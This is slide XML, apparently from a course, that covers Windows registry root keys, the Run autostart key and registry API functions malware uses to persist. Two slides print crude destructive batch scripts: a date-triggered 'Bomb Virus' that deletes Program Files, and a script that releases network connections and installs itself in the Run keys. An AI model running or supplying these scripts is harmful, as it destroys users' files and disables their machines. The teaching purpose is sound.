            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Value (Data)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>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17"/>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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142" name="Google Shape;1142;p117"/>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Registry Root Keys</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>HKEY_LOCAL_MACHINE (HKLM)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Stores settings that are global to the local machine</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>HKEY_CURRENT_USER (HKCU)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Stores settings specific to the current user</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>HKEY_CLASSES_ROOT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Stores information defining types</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>HKEY_CURRENT_CONFIG</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Stores settings about the current hardware configuration.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>HKEY_USERS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Defines settings for the default user, new users, and current users</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745024" y="5733256"/>
            <a:ext cx="7787416" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">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2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Registry Editor (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>regedit.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>): a built-in Windows tool used to view and edit the registry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18"/>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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p118"/>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Programs that Run Automatically</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>HKLM\Software\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p118"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="179511" y="2391906"/>
            <a:ext cx="8819381" cy="4466094"/>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19"/>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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p119"/>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Common Registry Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Malware often uses registry functions that are part of the Windows API to modify the registry to run automatically when the system boots</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1157" name="Google Shape;1157;p119"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179512" y="3212976"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{614F1EC8-023B-41F6-AEA7-A8C06D0698B5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2378850"/>
                <a:gridCol w="2134775"/>
                <a:gridCol w="2134775"/>
                <a:gridCol w="2134775"/>
              </a:tblGrid>
              <a:tr h="228600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>RegCloseKey</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegOpenKey</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegConnectRegistry</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegOpenKeyEx </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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r>
              <a:tr h="228600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>RegCreateKey</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegQueryInfoKey</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegCreateKeyEx</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegQueryMultipleValues </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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r>
              <a:tr h="228600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>RegDeleteKey</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegQueryValue</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegDeleteValue</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegQueryValueEx </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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r>
              <a:tr h="228600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>RegEnumKey</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegReplaceKey</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegEnumKeyEx</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegRestoreKey </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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r>
              <a:tr h="228600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>RegEnumValue</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegSaveKey</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegFlushKey</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegSetKeySecurity </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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r>
              <a:tr h="228600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>RegGetKeySecurity</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegSetValue</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegLoadKey</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegSetValueEx </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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r>
              <a:tr h="228600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegNotifyChangeKeyValue</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91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en-GB" sz="1800"/>
                        <a:t>RegUnLoadKey</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"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t/>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="A2A9B1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnT cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="A2A9B1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2809350"/>
            <a:ext cx="4381500" cy="1631950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7C80">
              <a:alpha val="49803"/>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1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&gt;&gt; Bomb Virus</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>If %date% NEQ 2019/04/30 goto exit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>del C:\Program Files\.... /y &gt;nul</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:exit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p12"/>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73" name="Google Shape;173;p12"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12700" y="0"/>
            <a:ext cx="9110324" cy="2769989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDE9D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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;Disable Internet Permanently (bat file)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16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lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>echo @echo off&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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echo break off&gt;&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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echo ipconfig/release_all&gt;&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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echo end&gt;&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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echo You Have Been HACKED!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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PAUSE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816707" y="2827743"/>
            <a:ext cx="4306317" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
